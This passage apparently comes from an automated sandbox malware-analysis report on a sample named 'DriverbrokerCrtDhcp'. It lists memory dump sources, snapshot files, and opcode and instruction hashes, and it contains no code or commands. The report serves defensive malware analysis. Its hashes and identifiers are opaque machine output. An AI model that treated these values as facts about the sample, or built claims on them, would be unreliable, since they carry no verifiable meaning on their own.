                                                                                      • Instruction ID: d8ee9f9f92671fda714a80e30090546ad0f5d42dd0bae2a9f4905a9366463336
                                                                                      • Opcode Fuzzy Hash: 2df01d14f31d44e3a60c93c374b702059d6a73ceda1e0907a74b39447322d658
                                                                                      • Instruction Fuzzy Hash: 37311B34A1C90FDAEBA8DB5485656BE77B1FF44700F500176D11ED2285DE3A7A40FA42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P|5
                                                                                      • API String ID: 0-469658915
                                                                                      • Opcode ID: a11b62759f8e98cbda23a08cc6eb95e085afe2f19881714b18c2127c652e3dfb
                                                                                      • Instruction ID: a77c95294a7c32023133a739560ebfc70d045a06b3e7b21e580db4602c78e940
                                                                                      • Opcode Fuzzy Hash: a11b62759f8e98cbda23a08cc6eb95e085afe2f19881714b18c2127c652e3dfb
                                                                                      • Instruction Fuzzy Hash: A6212910A1C46B4BE728821858706B97761FF41700B1445FAD15B8B8CFCA3EB981F7C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: e1e0799adc673ce612e240bbb605795f006569c5321d2578e22170a011cbdd2e
                                                                                      • Instruction ID: feee22d24e2b0b0633e21c0fbdc2667b85fd487711641e6972051b6235fe642b
                                                                                      • Opcode Fuzzy Hash: e1e0799adc673ce612e240bbb605795f006569c5321d2578e22170a011cbdd2e
                                                                                      • Instruction Fuzzy Hash: CEE06D7160E7C44FCB1AAA74886D854BFA0EF6721174A42EFC045CF1A7EA2D8889CB01
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 698140d9562c898d4b317e3d1fe27fe32eb682fa63b6077abb7b6b2d0980f241
                                                                                      • Instruction ID: 2b502a326cbe432b3525e50e04a8c3fec2f33402356b0863b04e3e077e496ad1
                                                                                      • Opcode Fuzzy Hash: 698140d9562c898d4b317e3d1fe27fe32eb682fa63b6077abb7b6b2d0980f241
                                                                                      • Instruction Fuzzy Hash: FA02A270A186558FEB58CF14C4E46B8B7A1FF46300F5442FEC94ECB68ADA38B881DB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b8b88c3aa3f0f70a4bec5f777146f4133bab19e769c17f6ead2775864c1a589b
                                                                                      • Instruction ID: ea9fcae07c2861ed86af3563aa242b213835f3149bcaacdb28017184f936999a
                                                                                      • Opcode Fuzzy Hash: b8b88c3aa3f0f70a4bec5f777146f4133bab19e769c17f6ead2775864c1a589b
                                                                                      • Instruction Fuzzy Hash: ACF180306196568FEB59CF19C4E16BD37A1FF46310F5445FAC94ACB68ACA3CE881CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 030182c74fad5145ea7e85bfcd6a170836c043e916affa184bd37fc22fb20b58
                                                                                      • Instruction ID: 2085c89341508f159e6aa247afe4c9fb6d746205a3254c4cc1a4055a33f31144
                                                                                      • Opcode Fuzzy Hash: 030182c74fad5145ea7e85bfcd6a170836c043e916affa184bd37fc22fb20b58
                                                                                      • Instruction Fuzzy Hash: 56D1D330A0DA464FE369DB2AD0E157D77E1FF46310B1445BFC58EC7682DA2EB8429B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f4850f374c827f7eda9d438e8ef6e4a9332217d91ad1c495e330aeae0a1bcb7
                                                                                      • Instruction ID: d11649df7db6995e3c206874ef97eb1ff2f49dd5902a362957d1de5172f247e5
                                                                                      • Opcode Fuzzy Hash: 9f4850f374c827f7eda9d438e8ef6e4a9332217d91ad1c495e330aeae0a1bcb7
                                                                                      • Instruction Fuzzy Hash: 89D1E032A0DA468FE368DB28D4E117577E1FF46300B19467EC58AC7692DE2EF8429B41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cb5dec02f034502011515bd56ff3ea5b5a67983e7a619f9a26e49a2e324d1144
                                                                                      • Instruction ID: 090da25733e0d867f914d6261d59fe6ca2c0112685b83f6cdca301036fe3b77f
                                                                                      • Opcode Fuzzy Hash: cb5dec02f034502011515bd56ff3ea5b5a67983e7a619f9a26e49a2e324d1144
                                                                                      • Instruction Fuzzy Hash: EBE1A3706186458FEB59CF19C4E05B937A1FF46321B5886BEC94ADB68BC73CE881CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f816cc6427d2e8570150bdc5fa60afc3834e49a9d44dc5e3c92665fca190fb3
                                                                                      • Instruction ID: 780ddd5b6212c3985588e96ce68d857bbe2214175224757dd3a2408ae1667c02
                                                                                      • Opcode Fuzzy Hash: 8f816cc6427d2e8570150bdc5fa60afc3834e49a9d44dc5e3c92665fca190fb3
                                                                                      • Instruction Fuzzy Hash: 4CD1D030E0DA468FE369DB29D4A85BD77E1FF46300B2445BFC58AC7682DE2DB8429741
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f520558d6e309aa20ab7b81965611fb4ca3ff5c8d1104fe341ca6939a8708757
                                                                                      • Instruction ID: 0f9c98df34ed38faaadfe910344bed4e67c1ae60a7d6f3459244b9cfd9ed9d18
                                                                                      • Opcode Fuzzy Hash: f520558d6e309aa20ab7b81965611fb4ca3ff5c8d1104fe341ca6939a8708757
                                                                                      • Instruction Fuzzy Hash: A8B1173370C6559FE764AA6CE8A65F577E0EF4632070C02BAE18DC7593DA2CB805C781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7395075dceae5be0c9d4f86601a4293c08ce2edb985b034d5a7e4770e391a447
                                                                                      • Instruction ID: eb2765af0a6999488fcc1ce30f9f3715418cb5d391ad7d98fdd4290526c1b3fb
                                                                                      • Opcode Fuzzy Hash: 7395075dceae5be0c9d4f86601a4293c08ce2edb985b034d5a7e4770e391a447
                                                                                      • Instruction Fuzzy Hash: A5C15231718A1D8FEB58DB58C8959B9B3F2FF59314B1441A9D14EC72A2DE35EC42CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87c188edcf6e078395474de3f0353bacde663f21a607c48ce137e4334b7eeb42
                                                                                      • Instruction ID: af811f9f555dffa9ca0f0526bebaf8456c8129ba3b7b315aa3e8c565ada861e7
                                                                                      • Opcode Fuzzy Hash: 87c188edcf6e078395474de3f0353bacde663f21a607c48ce137e4334b7eeb42
                                                                                      • Instruction Fuzzy Hash: 64C1A2706185468BEB19CF19C0E05B937A1FF46325B5886BEC94BDB68BCB3CE841DB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64924ab372a29823c7747270ba4567b7f1eaafba20fd84045fa55c3e94cd351c
                                                                                      • Instruction ID: ee3ef6248d327a2b746d64ef729cd770d666afd2fcd099d16c1ebb25ac16d2ee
                                                                                      • Opcode Fuzzy Hash: 64924ab372a29823c7747270ba4567b7f1eaafba20fd84045fa55c3e94cd351c
                                                                                      • Instruction Fuzzy Hash: E3A15C3170D74A4FE728EB1998B65FD37A0EF46320B1842FBD18DC7593DA1CA8068782
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 199c46151f3cde1daf7d5f3912ba35146e98e9a22de23d4e6e8524b25729516d
                                                                                      • Instruction ID: bca31e2b0fb6f39948482cbcf02901a92ad5a372a84af44aef812e1e9d1b028e
                                                                                      • Opcode Fuzzy Hash: 199c46151f3cde1daf7d5f3912ba35146e98e9a22de23d4e6e8524b25729516d
                                                                                      • Instruction Fuzzy Hash: F6C1BE316185468FEB0DCF18C4E49B137A1FF46310B5846BDC94ACB68BDA3CE891DB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26aef1bd2180a23a69c5a7eaddd301cef07bdbea2d204d7d6397f1237d5fe10c
                                                                                      • Instruction ID: a6a6dbc3145394216039b0dbc48bb6651c04d27941e5ee6b0f435037e6447fa3
                                                                                      • Opcode Fuzzy Hash: 26aef1bd2180a23a69c5a7eaddd301cef07bdbea2d204d7d6397f1237d5fe10c
                                                                                      • Instruction Fuzzy Hash: 0CC18C306195568BEB19CF16C0E15B937A1FF86310B5446BEC95ACB68BCA3CF881DB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 210547040f877e488969c05f1082bee17f4fdee0cac1777b06405bcdf7606334
                                                                                      • Instruction ID: 72698e2df6087ac6297aba9971c7fe9122ced7713011337ffd04ac751ca3edf7
                                                                                      • Opcode Fuzzy Hash: 210547040f877e488969c05f1082bee17f4fdee0cac1777b06405bcdf7606334
                                                                                      • Instruction Fuzzy Hash: 5EC1AD706186468BEB19CF05C0E45B9B7A1FF46310F5446FEC94ACB68ACA3CF881DB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a98714db8a417863fd90eca23660474343de2064ccb2ec86957d8a164873d9d8
                                                                                      • Instruction ID: c0d1704999fd174ea668dbb2e7d542559d64bdfc950b88bcf7a15f073bc7c5e1
                                                                                      • Opcode Fuzzy Hash: a98714db8a417863fd90eca23660474343de2064ccb2ec86957d8a164873d9d8
                                                                                      • Instruction Fuzzy Hash: 1AC1A030708A469FE74DDB29C0A16ACB7A1FF5A310F5441BAC54EC7A87CB38B851CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c0d072a6f3de55f8b73634577cc5d73f81fda1d5f78122c05251b97a996b7095
                                                                                      • Instruction ID: 33235a879819aba6be88e4caf655ce92c4844e5288010d2b7ee51261db46d61f
                                                                                      • Opcode Fuzzy Hash: c0d072a6f3de55f8b73634577cc5d73f81fda1d5f78122c05251b97a996b7095
                                                                                      • Instruction Fuzzy Hash: F4C1F3716186458FEB48CF18C4E46B13BA1FF46310B5842BDC94ACB68BD77CE891CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c446a26459db63881a12341d4437a85f432a6b8fb4c91b052a5f9297f72a1fa8
                                                                                      • Instruction ID: ab4c5f2b2b4c3b4e944d079541906e89483446ad9d977acb46727895eee53be7
                                                                                      • Opcode Fuzzy Hash: c446a26459db63881a12341d4437a85f432a6b8fb4c91b052a5f9297f72a1fa8
                                                                                      • Instruction Fuzzy Hash: 65C1E431708A469FE749DB58C4E06A4B7E1FF4A300F5842B9C54EC7A86CB3CB861CB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16df4d441e140a40eb8c02f7a921577147c7b1346b203a5878718895fdd7c8ab
                                                                                      • Instruction ID: 1552e5eb292784821418d70326435eee06b552ec60271e1ed748093bd705e283
                                                                                      • Opcode Fuzzy Hash: 16df4d441e140a40eb8c02f7a921577147c7b1346b203a5878718895fdd7c8ab
                                                                                      • Instruction Fuzzy Hash: 31C1B130708A468FE749DB29C4A16B8B7A1FF5A310F5441FAC54EC7A96CB3CB851DB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5db6f9f7f2712229a549fe36350d9e31dcc588f4852e1d22f7094bfeac1a6ed6
                                                                                      • Instruction ID: 2ffd506a8030e9cd12cdff2ed6e99e94ef188074a0e63745b8b35b923a0989cf
                                                                                      • Opcode Fuzzy Hash: 5db6f9f7f2712229a549fe36350d9e31dcc588f4852e1d22f7094bfeac1a6ed6
                                                                                      • Instruction Fuzzy Hash: 69B1C171B19A469FE749DB18C0E06A4B7E1FF46300F5842B9C54EC7A8ADB38B851CB94
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f05eaf427e0d47bd045b4597fea7e2bf552a21c495563082e4a3728cc9566f87
                                                                                      • Instruction ID: d530848e48b1e2ee91d8e78dea4390a64898691a0f8d41cebef61f2c147dcb31
                                                                                      • Opcode Fuzzy Hash: f05eaf427e0d47bd045b4597fea7e2bf552a21c495563082e4a3728cc9566f87
                                                                                      • Instruction Fuzzy Hash: 9A218D13F0C1578BFA7826E828B11F82750EF47321F2C03BBD64DC60A28C5D38466282
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 476aa63d4782e04ea0b8abd1fbe6c04312712c962ce404c0deff01c998a5f057
                                                                                      • Instruction ID: 6790729ba6f782b1c5e165e75e4880566a4285b9db51a03c2fa2661e21147ca1
                                                                                      • Opcode Fuzzy Hash: 476aa63d4782e04ea0b8abd1fbe6c04312712c962ce404c0deff01c998a5f057
                                                                                      • Instruction Fuzzy Hash: F0218D22F0D5979AF66466AA28B10FC2A60DF57324F2842F7D64DC62E3DC1D78457382
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b6554e5c5058017bb24d131f433d017b5ca59da12bd1b6e865f0ba469a375f2
                                                                                      • Instruction ID: 761572a76508e9a72918f45c6d5aa19e344e77a66fd84bd9c0bd1515e0910619
                                                                                      • Opcode Fuzzy Hash: 0b6554e5c5058017bb24d131f433d017b5ca59da12bd1b6e865f0ba469a375f2
                                                                                      • Instruction Fuzzy Hash: 3391383170C5894FE768DA1988A65BD37D0FF46320B1402FBD69EC75B2DA1CA81AC782
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9dd8cd31efe80eae0ba465411bf58e2c11e8cdb1b49930fb9771b904d85dc5d6
                                                                                      • Instruction ID: c5a79efbf6c8d1bee5405742d06ef2019bbb9f856703eed9f21024d63519f5f5
                                                                                      • Opcode Fuzzy Hash: 9dd8cd31efe80eae0ba465411bf58e2c11e8cdb1b49930fb9771b904d85dc5d6
                                                                                      • Instruction Fuzzy Hash: 9E21CF12F0D79346F62526B628B10FC5794AF57794F2C41F7E68EC65CADC4C28457282
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34ba8c3435efb662379ed0f024bc3e60729c35a27271e5ce606c5b713bf0af05
                                                                                      • Instruction ID: 373ab01a93d3c8dbfb13c3325c5f2c4229092dbe83bba25070251ff1e3312535
                                                                                      • Opcode Fuzzy Hash: 34ba8c3435efb662379ed0f024bc3e60729c35a27271e5ce606c5b713bf0af05
                                                                                      • Instruction Fuzzy Hash: 0D816E33B0D5494FE7A8DA1898AA5B937D0FF47310B0813BAD29EC7593DE1CA8169781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d76ad795f0f68ac6f4eb5f56b61e28a30621400a4ee2aa60e891f4e54fe0d607
                                                                                      • Instruction ID: 8ca1b9f357f755b1bbbfb010047a6fc6cb176a611bd9f0071bd916b9b8d98749
                                                                                      • Opcode Fuzzy Hash: d76ad795f0f68ac6f4eb5f56b61e28a30621400a4ee2aa60e891f4e54fe0d607
                                                                                      • Instruction Fuzzy Hash: B0712711B1DE4A0AF7A9663C08A52B97AC2EF87715F25127DE5CFC32C3DD1C6807A281
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e94952201d764cd576c49f6be199dc398639ba45ef9b020242dd698e3c1fbe3c
                                                                                      • Instruction ID: 4aff008abfd3e7596edcca1aacc4d8d3b7816416a3c029be3698fe18a69d242a
                                                                                      • Opcode Fuzzy Hash: e94952201d764cd576c49f6be199dc398639ba45ef9b020242dd698e3c1fbe3c
                                                                                      • Instruction Fuzzy Hash: A211E052F0E7838AF679666618B11BC5AC09F532A4F1881FBE64EC64DA9C4C2844B382
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 671c443bc97ccc726b50950c6d026a52b9c75dd5082107daecbd94824713af23
                                                                                      • Instruction ID: d1d3d7816270acb124ae10796fa7f86414aeda00881a2193e9e3d493a72352cd
                                                                                      • Opcode Fuzzy Hash: 671c443bc97ccc726b50950c6d026a52b9c75dd5082107daecbd94824713af23
                                                                                      • Instruction Fuzzy Hash: 80813932B0CA464FE3789A2894E55B9B7E1EF47310B58067FD58FC3292DE2DB8029751
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12f58363ff8b33d71ab80aac7654e790c7f43203591cab47c6da7c0b18ac646d
                                                                                      • Instruction ID: cdb6f8bf4d9a865f16fc42cf52fc2b923ab6db1341e4e40d4ee6a3907dc82d72
                                                                                      • Opcode Fuzzy Hash: 12f58363ff8b33d71ab80aac7654e790c7f43203591cab47c6da7c0b18ac646d
                                                                                      • Instruction Fuzzy Hash: D1812731B0D64A4FE3285A2A54A547E7BE0FF47350B1405BFE58EC3183DE2CB4129761
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bef14e64f4386a4a2ec7cf7f99cda8057b2b3bb10a0e4d66b0ba353284940cbb
                                                                                      • Instruction ID: 6e39844e1dff2fa1f8c89953d9c32419ad6185e98cf0cc7fb26c84c1b41e3977
                                                                                      • Opcode Fuzzy Hash: bef14e64f4386a4a2ec7cf7f99cda8057b2b3bb10a0e4d66b0ba353284940cbb
                                                                                      • Instruction Fuzzy Hash: 85818222F0D6966BE761A7BCA8B10ED7FB09F13324B1C01B7D18CDA193ED2C64469385
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f56261bbc3873bb9ff59b21858c7b568b3b7c7b06fb501e3b81a6801249b74c6
                                                                                      • Instruction ID: fb31eda51e6a42ecda98fdffa29343fc6283a378d6b69b32e74e41c13b1be130
                                                                                      • Opcode Fuzzy Hash: f56261bbc3873bb9ff59b21858c7b568b3b7c7b06fb501e3b81a6801249b74c6
                                                                                      • Instruction Fuzzy Hash: DF71D130E1D54E8FEBA4DBA588A46BDBBB1FF5A310F5004BAD50ED7181DE3C68819B40
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 91f29592cef430266911c295f01f3a2cd357a7086ceae8acecaa21be459e880e
